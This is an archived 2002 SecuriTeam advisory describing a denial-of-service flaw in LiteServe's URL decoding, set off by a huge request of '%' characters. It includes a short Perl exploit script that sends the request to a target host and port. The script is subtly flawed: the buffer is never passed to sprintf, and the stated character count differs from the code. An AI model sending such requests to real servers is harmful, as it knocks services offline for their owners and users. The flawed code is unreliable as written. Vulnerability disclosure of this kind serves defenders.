[NT] LiteServe URL Decoding DoS

From: support@securiteam.com
Date: 11/18/02

  • Next message: support@securiteam.com: "[REVS] Security holes... Who cares? (Security patches handling case study)"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Nov 2002 10:20:30 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      LiteServe URL Decoding DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.cmfperception.com/> LiteServe is a powerful, full-featured
    Web, email and FTP server. This server software is perfect for personal
    websites or commercial sites with high traffic demands and multiple
    domains. A vulnerability in the way the program decodes URL allows remote
    attackers to cause it to crash.

    DETAILS

    LiteServe's URL decoder has a problem handling illegal "%xx" sequences,
    such as "%.@", for example, and may produce corrupted output when such a
    sequence is used. The problem appears to be a referencing issue when the
    decode sequence does not specify a legitamite hexadecimal sequence. A
    denial of service may occur if LiteServe is passed an extremely large
    request consisting only of "%" characters. 290,259 such characters will
    cause LiteServe to freeze:

    GET /[buffer] HTTP/1.0

    After this request is processed, attempting to connect to the HTTP service
    reveals that the server is dead.

    Exploit:
    #!/usr/bin/perl
    use IO::Socket;
    $buffer="%"x290759;
    $req=sprintf("GET /%s HTTP/1.0\r\n\r\n");
    $f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp")
    ;
    print $f $req;
    undef $f;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mattmurphy@kc.rr.com>
    Matthew Murphy.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



    Relevant Pages

    • Re: Tom Porterfield MS-MVP?
      ... > Let me begin with the fact that I have the utmost respect ... one reason only. ... to the posts by the server. ... Your first post (sequence 98349): ...
      (microsoft.public.windowsxp.security_admin)
    • Re: Math.random() algorithm
      ... If all numbers are issued by a single server, the task is trivial, as ... I want a standard way to assign a unique id to every single XML ... permuted or flipped so that the sequence is not obvious from samples). ... The problem lies in getting enough apparent randomness to initialise the ...
      (comp.lang.javascript)
    • Re: Pine sorting
      ... How does pine figure out when a message arrives at the server? ... it gets a new sequence number and UID. ... So do you know which method Pine uses -- sequence number or UID? ...
      (comp.mail.pine)
    • Re: sequence returns zero
      ... I have a problem with a table whose key column defaults to ... My working theory is that the sequence values are cached in the server ... iisequence catalog is not re-read. ...
      (comp.databases.ingres)
    • Re: Unique consecutive number for id
      ... Application in VB6, using ADO 2.7, SQL Server 2000. ... sequence can start at 1 or 4500 or whatever) ... Using an Identity column requires that it is returned to the client and doesn't guarantee consecutive numbers. ...
      (microsoft.public.sqlserver.programming)